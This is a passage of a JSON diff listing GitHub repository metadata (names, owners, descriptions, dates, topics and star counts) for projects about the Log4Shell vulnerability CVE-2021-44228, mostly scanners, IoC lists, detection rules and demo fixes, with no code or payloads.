+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437948564,
+ "name": "log4shell_ioc_ips",
+ "full_name": "hackinghippo\/log4shell_ioc_ips",
+ "owner": {
+ "login": "hackinghippo",
+ "id": 96073490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96073490?v=4",
+ "html_url": "https:\/\/github.com\/hackinghippo"
+ },
+ "html_url": "https:\/\/github.com\/hackinghippo\/log4shell_ioc_ips",
+ "description": "log4j \/ log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-13T16:39:16Z",
+ "updated_at": "2023-12-11T04:51:15Z",
+ "pushed_at": "2022-01-07T17:00:38Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-44228",
+ "ioc",
+ "list",
+ "log4j",
+ "log4shell",
+ "shell4log"
+ ],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437948858,
+ "name": "log4j-1.2.15-mod",
+ "full_name": "p3dr16k\/log4j-1.2.15-mod",
+ "owner": {
+ "login": "p3dr16k",
+ "id": 9317261,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9317261?v=4",
+ "html_url": "https:\/\/github.com\/p3dr16k"
+ },
+ "html_url": "https:\/\/github.com\/p3dr16k\/log4j-1.2.15-mod",
+ "description": "log4j version 1 with a patch for CVE-2021-44228 vulnerability",
+ "fork": false,
+ "created_at": "2021-12-13T16:40:14Z",
+ "updated_at": "2021-12-14T11:41:29Z",
+ "pushed_at": "2021-12-14T11:39:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437949273,
+ "name": "ansible-role-log4shell",
+ "full_name": "claranet\/ansible-role-log4shell",
+ "owner": {
+ "login": "claranet",
+ "id": 7526691,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7526691?v=4",
+ "html_url": "https:\/\/github.com\/claranet"
+ },
+ "html_url": "https:\/\/github.com\/claranet\/ansible-role-log4shell",
+ "description": "Find Log4Shell CVE-2021-44228 on your system",
+ "fork": false,
+ "created_at": "2021-12-13T16:41:31Z",
+ "updated_at": "2023-11-16T14:11:42Z",
+ "pushed_at": "2024-06-20T08:48:06Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ansible",
+ "claranet",
+ "log4j",
+ "log4shell",
+ "role"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 15
+ },
+ {
+ "id": 437960695,
+ "name": "CVE-2021-44228",
+ "full_name": "taurusxin\/CVE-2021-44228",
+ "owner": {
+ "login": "taurusxin",
+ "id": 17809960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17809960?v=4",
+ "html_url": "https:\/\/github.com\/taurusxin"
+ },
+ "html_url": "https:\/\/github.com\/taurusxin\/CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T17:17:37Z",
+ "updated_at": "2023-12-04T14:09:28Z",
+ "pushed_at": "2021-12-13T17:22:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437963154,
+ "name": "cve-2021-44228",
+ "full_name": "corelight\/cve-2021-44228",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/cve-2021-44228",
+ "description": "Log4j Exploit Detection Logic for Zeek",
+ "fork": false,
+ "created_at": "2021-12-13T17:25:52Z",
+ "updated_at": "2022-02-09T10:00:20Z",
+ "pushed_at": "2024-05-04T18:38:58Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "zeek"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 437965181,
+ "name": "log4j2-prosecutor",
+ "full_name": "rodfer0x80\/log4j2-prosecutor",
+ "owner": {
+ "login": "rodfer0x80",
+ "id": 52704508,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52704508?v=4",
+ "html_url": "https:\/\/github.com\/rodfer0x80"
+ },
+ "html_url": "https:\/\/github.com\/rodfer0x80\/log4j2-prosecutor",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T17:32:26Z",
+ "updated_at": "2021-12-23T10:05:33Z",
+ "pushed_at": "2021-12-23T10:05:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437968616,
+ "name": "CVE-2021-44228_Log4Shell",
+ "full_name": "yanghaoi\/CVE-2021-44228_Log4Shell",
+ "owner": {
+ "login": "yanghaoi",
+ "id": 21354684,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21354684?v=4",
+ "html_url": "https:\/\/github.com\/yanghaoi"
+ },
+ "html_url": "https:\/\/github.com\/yanghaoi\/CVE-2021-44228_Log4Shell",
+ "description": "Log4Shell A test for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T17:44:01Z",
+ "updated_at": "2021-12-13T18:03:51Z",
+ "pushed_at": "2021-12-13T18:06:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437983994,
+ "name": "log4j_checker",
+ "full_name": "lfama\/log4j_checker",
+ "owner": {
+ "login": "lfama",
+ "id": 14056990,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14056990?v=4",
+ "html_url": "https:\/\/github.com\/lfama"
+ },
+ "html_url": "https:\/\/github.com\/lfama\/log4j_checker",
+ "description": "Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.",
+ "fork": false,
+ "created_at": "2021-12-13T18:35:16Z",
+ "updated_at": "2024-01-16T00:41:28Z",
+ "pushed_at": "2021-12-21T16:01:08Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4shell",
+ "python",
+ "python3",
+ "scan",
+ "scanner",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437988861,
+ "name": "Log4j-IOCs",
+ "full_name": "threatmonit\/Log4j-IOCs",
+ "owner": {
+ "login": "threatmonit",
+ "id": 90388073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90388073?v=4",
+ "html_url": "https:\/\/github.com\/threatmonit"
+ },
+ "html_url": "https:\/\/github.com\/threatmonit\/Log4j-IOCs",
+ "description": "Public IOCs about log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T18:52:19Z",
+ "updated_at": "2023-05-09T18:44:15Z",
+ "pushed_at": "2021-12-13T19:11:30Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437995131,
+ "name": "l4j-info",
+ "full_name": "ben-smash\/l4j-info",
+ "owner": {
+ "login": "ben-smash",
+ "id": 95368649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95368649?v=4",
+ "html_url": "https:\/\/github.com\/ben-smash"
+ },
+ "html_url": "https:\/\/github.com\/ben-smash\/l4j-info",
+ "description": "Compiling links of value i find regarding CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T19:14:23Z",
+ "updated_at": "2021-12-13T21:11:09Z",
+ "pushed_at": "2021-12-13T21:11:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438003225,
+ "name": "log4j-test",
+ "full_name": "strawhatasif\/log4j-test",
+ "owner": {
+ "login": "strawhatasif",
+ "id": 10750101,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10750101?v=4",
+ "html_url": "https:\/\/github.com\/strawhatasif"
+ },
+ "html_url": "https:\/\/github.com\/strawhatasif\/log4j-test",
+ "description": "Demonstration of CVE-2021-44228 with a possible strategic fix.",
+ "fork": false,
+ "created_at": "2021-12-13T19:43:01Z",
+ "updated_at": "2021-12-13T20:26:40Z",
+ "pushed_at": "2021-12-13T20:26:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438012376,
+ "name": "nmap-log4shell",
+ "full_name": "giterlizzi\/nmap-log4shell",
+ "owner": {
+ "login": "giterlizzi",
+ "id": 1824717,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1824717?v=4",
+ "html_url": "https:\/\/github.com\/giterlizzi"
+ },
+ "html_url": "https:\/\/github.com\/giterlizzi\/nmap-log4shell",
+ "description": "Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-13T20:17:14Z",
+ "updated_at": "2024-06-25T13:51:03Z",
+ "pushed_at": "2021-12-17T17:23:57Z",
+ "stargazers_count": 75,
+ "watchers_count": 75,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4shell",
+ "nmap",
+ "nmap-scripts",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 75,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 438013062,
+ "name": "Siem-queries-for-CVE-2021-44228",
+ "full_name": "tica506\/Siem-queries-for-CVE-2021-44228",
+ "owner": {
+ "login": "tica506",
+ "id": 93236626,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93236626?v=4",
+ "html_url": "https:\/\/github.com\/tica506"
+ },
+ "html_url": "https:\/\/github.com\/tica506\/Siem-queries-for-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T20:19:57Z",
+ "updated_at": "2021-12-13T20:56:54Z",
+ "pushed_at": "2021-12-13T20:56:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438021782,
+ "name": "log4shell-example",
+ "full_name": "chilit-nl\/log4shell-example",
+ "owner": {
+ "login": "chilit-nl",
+ "id": 96049152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96049152?v=4",
+ "html_url": "https:\/\/github.com\/chilit-nl"
+ },
+ "html_url": "https:\/\/github.com\/chilit-nl\/log4shell-example",
+ "description": "The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to show how to fix it.",
+ "fork": false,
+ "created_at": "2021-12-13T20:54:10Z",
+ "updated_at": "2021-12-14T08:30:57Z",
+ "pushed_at": "2021-12-14T08:18:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4j2",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438026042,
+ "name": "log4j-checker",
+ "full_name": "Occamsec\/log4j-checker",
+ "owner": {
+ "login": "Occamsec",
+ "id": 55592824,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55592824?v=4",
+ "html_url": "https:\/\/github.com\/Occamsec"
+ },
+ "html_url": "https:\/\/github.com\/Occamsec\/log4j-checker",
+ "description": "Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 aka Log4Shell.",
+ "fork": false,
+ "created_at": "2021-12-13T21:11:18Z",
+ "updated_at": "2021-12-21T15:16:18Z",
+ "pushed_at": "2021-12-16T17:44:06Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438028657,
+ "name": "log4j2-CVE-2021-44228-poc-local",
+ "full_name": "snatalius\/log4j2-CVE-2021-44228-poc-local",
+ "owner": {
+ "login": "snatalius",
+ "id": 22771118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22771118?v=4",
+ "html_url": "https:\/\/github.com\/snatalius"
+ },
+ "html_url": "https:\/\/github.com\/snatalius\/log4j2-CVE-2021-44228-poc-local",
+ "description": "Just a personal proof of concept of CVE-2021-44228 on log4j2",
+ "fork": false,
+ "created_at": "2021-12-13T21:21:53Z",
+ "updated_at": "2021-12-13T21:21:56Z",
+ "pushed_at": "2021-12-13T21:21:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438032780,
+ "name": "CVE-2021-44228",
+ "full_name": "Contrast-Security-OSS\/CVE-2021-44228",
+ "owner": {
+ "login": "Contrast-Security-OSS",
+ "id": 5577345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5577345?v=4",
+ "html_url": "https:\/\/github.com\/Contrast-Security-OSS"
+ },
+ "html_url": "https:\/\/github.com\/Contrast-Security-OSS\/CVE-2021-44228",
+ "description": "Professional Service scripts to aid in the identification of affected Java applications in TeamServer",
+ "fork": false,
+ "created_at": "2021-12-13T21:39:39Z",
+ "updated_at": "2021-12-14T01:40:19Z",
+ "pushed_at": "2021-12-22T13:15:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 438032826,
+ "name": "log4shell-rex",
+ "full_name": "back2root\/log4shell-rex",
+ "owner": {
+ "login": "back2root",
+ "id": 9200239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9200239?v=4",
+ "html_url": "https:\/\/github.com\/back2root"
+ },
+ "html_url": "https:\/\/github.com\/back2root\/log4shell-rex",
+ "description": "PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs",
+ "fork": false,
+ "created_at": "2021-12-13T21:39:51Z",
+ "updated_at": "2024-06-02T17:22:11Z",
+ "pushed_at": "2021-12-21T01:24:46Z",
+ "stargazers_count": 293,
+ "watchers_count": 293,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 293,
+ "score": 0,
+ "subscribers_count": 12
+ },
+ {
+ "id": 438034703,
+ "name": "log4shell-tools",
+ "full_name": "alexbakker\/log4shell-tools",
+ "owner": {
+ "login": "alexbakker",
+ "id": 2387841,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2387841?v=4",
+ "html_url": "https:\/\/github.com\/alexbakker"
+ },
+ "html_url": "https:\/\/github.com\/alexbakker\/log4shell-tools",
+ "description": "Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046",
+ "fork": false,
+ "created_at": "2021-12-13T21:47:41Z",
+ "updated_at": "2024-05-10T13:50:09Z",
+ "pushed_at": "2024-04-07T22:45:53Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "dns",
+ "jndi",
+ "ldap",
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438043313,
+ "name": "find-log4j",
+ "full_name": "perryflynn\/find-log4j",
+ "owner": {
+ "login": "perryflynn",
+ "id": 1693988,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1693988?v=4",
+ "html_url": "https:\/\/github.com\/perryflynn"
+ },
+ "html_url": "https:\/\/github.com\/perryflynn\/find-log4j",
+ "description": "Find log4j for CVE-2021-44228 on some places * Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-13T22:26:04Z",
+ "updated_at": "2021-12-21T07:48:29Z",
+ "pushed_at": "2021-12-14T21:11:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4j2",
+ "log4jshell"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438050019,
+ "name": "jndiRep",
+ "full_name": "5l1v3r1\/jndiRep",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/jndiRep",
+ "description": "Scan your logs for CVE-2021-44228 related activity and report the attackers",
+ "fork": false,
+ "created_at": "2021-12-13T22:59:08Z",
+ "updated_at": "2023-05-22T11:07:24Z",
+ "pushed_at": "2021-12-11T23:45:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438090697,
+ "name": "log4j-cve-2021-44228-sample",
+ "full_name": "alpacamybags118\/log4j-cve-2021-44228-sample",
+ "owner": {
+ "login": "alpacamybags118",
+ "id": 16386559,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16386559?v=4",
+ "html_url": "https:\/\/github.com\/alpacamybags118"
+ },
+ "html_url": "https:\/\/github.com\/alpacamybags118\/log4j-cve-2021-44228-sample",
+ "description": "Sample docker-compose setup to show how this exploit works",
+ "fork": false,
+ "created_at": "2021-12-14T02:26:52Z",
+ "updated_at": "2022-11-21T21:14:16Z",
+ "pushed_at": "2022-01-14T14:13:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438090719,
+ "name": "log4j2-issue-check",
+ "full_name": "sandarenu\/log4j2-issue-check",
+ "owner": {
+ "login": "sandarenu",
+ "id": 808954,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/808954?v=4",
+ "html_url": "https:\/\/github.com\/sandarenu"
+ },
+ "html_url": "https:\/\/github.com\/sandarenu\/log4j2-issue-check",
+ "description": "Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T02:26:56Z",
+ "updated_at": "2021-12-14T03:53:41Z",
+ "pushed_at": "2021-12-14T03:53:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438112808,
+ "name": "CVE-2021-44228-Demo",
+ "full_name": "roticagas\/CVE-2021-44228-Demo",
+ "owner": {
+ "login": "roticagas",
+ "id": 17757134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17757134?v=4",
+ "html_url": "https:\/\/github.com\/roticagas"
+ },
+ "html_url": "https:\/\/github.com\/roticagas\/CVE-2021-44228-Demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-14T04:09:02Z",
+ "updated_at": "2021-12-15T07:13:10Z",
+ "pushed_at": "2021-12-15T07:13:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438118026,
+ "name": "log4j-urlscanner",
+ "full_name": "Woahd\/log4j-urlscanner",
+ "owner": {
+ "login": "Woahd",
+ "id": 91861246,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91861246?v=4",
+ "html_url": "https:\/\/github.com\/Woahd"
+ },
+ "html_url": "https:\/\/github.com\/Woahd\/log4j-urlscanner",
+ "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading",
+ "fork": false,
+ "created_at": "2021-12-14T04:35:20Z",
+ "updated_at": "2021-12-15T04:54:26Z",
+ "pushed_at": "2021-12-15T04:54:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438128189,
+ "name": "Log4j2-CVE-2021-44228-revshell",
+ "full_name": "faisalfs10x\/Log4j2-CVE-2021-44228-revshell",
+ "owner": {
+ "login": "faisalfs10x",
+ "id": 51811615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4",
+ "html_url": "https:\/\/github.com\/faisalfs10x"
+ },
+ "html_url": "https:\/\/github.com\/faisalfs10x\/Log4j2-CVE-2021-44228-revshell",
+ "description": "Log4j2 CVE-2021-44228 revshell, ofc it suck!!",
+ "fork": false,
+ "created_at": "2021-12-14T05:24:52Z",
+ "updated_at": "2024-04-26T06:52:49Z",
+ "pushed_at": "2021-12-21T19:48:57Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "log4j",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438135281,
+ "name": "chk_log4j",
+ "full_name": "gcmurphy\/chk_log4j",
+ "owner": {
+ "login": "gcmurphy",
+ "id": 222833,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/222833?v=4",
+ "html_url": "https:\/\/github.com\/gcmurphy"
+ },
+ "html_url": "https:\/\/github.com\/gcmurphy\/chk_log4j",
+ "description": "Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T05:58:28Z",
+ "updated_at": "2023-03-08T02:33:19Z",
+ "pushed_at": "2021-12-14T12:20:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jar",
+ "log4j",
+ "log4shell",
+ "rust"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438144746,
+ "name": "LogMePwn",
+ "full_name": "0xInfection\/LogMePwn",
+ "owner": {
+ "login": "0xInfection",
+ "id": 39941993,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39941993?v=4",
+ "html_url": "https:\/\/github.com\/0xInfection"
+ },
+ "html_url": "https:\/\/github.com\/0xInfection\/LogMePwn",
+ "description": "A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-14T06:37:59Z",
+ "updated_at": "2024-06-17T04:51:34Z",
+ "pushed_at": "2024-04-24T05:35:26Z",
+ "stargazers_count": 381,
+ "watchers_count": 381,
+ "has_discussions": false,
+ "forks_count": 53,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "internet-scanning",
+ "log4j",
+ "rce-scanner",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 53,
+ "watchers": 381,
+ "score": 0,
+ "subscribers_count": 12
+ },
+ {
+ "id": 438148080,
+ "name": "apache-solr-log4j-CVE-2021-44228",
+ "full_name": "toramanemre\/apache-solr-log4j-CVE-2021-44228",
+ "owner": {
+ "login": "toramanemre",
+ "id": 24626967,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626967?v=4",
+ "html_url": "https:\/\/github.com\/toramanemre"
+ },
+ "html_url": "https:\/\/github.com\/toramanemre\/apache-solr-log4j-CVE-2021-44228",
+ "description": "A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T06:51:30Z",
+ "updated_at": "2023-07-28T09:59:43Z",
+ "pushed_at": "2021-12-14T06:51:51Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438165990,
+ "name": "log4j-scanner",
+ "full_name": "codiobert\/log4j-scanner",
+ "owner": {
+ "login": "codiobert",
+ "id": 10519412,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10519412?v=4",
+ "html_url": "https:\/\/github.com\/codiobert"
+ },
+ "html_url": "https:\/\/github.com\/codiobert\/log4j-scanner",
+ "description": "Check CVE-2021-44228 vulnerability",
+ "fork": false,
+ "created_at": "2021-12-14T07:59:14Z",
+ "updated_at": "2022-01-30T16:35:24Z",
+ "pushed_at": "2021-12-15T17:08:42Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
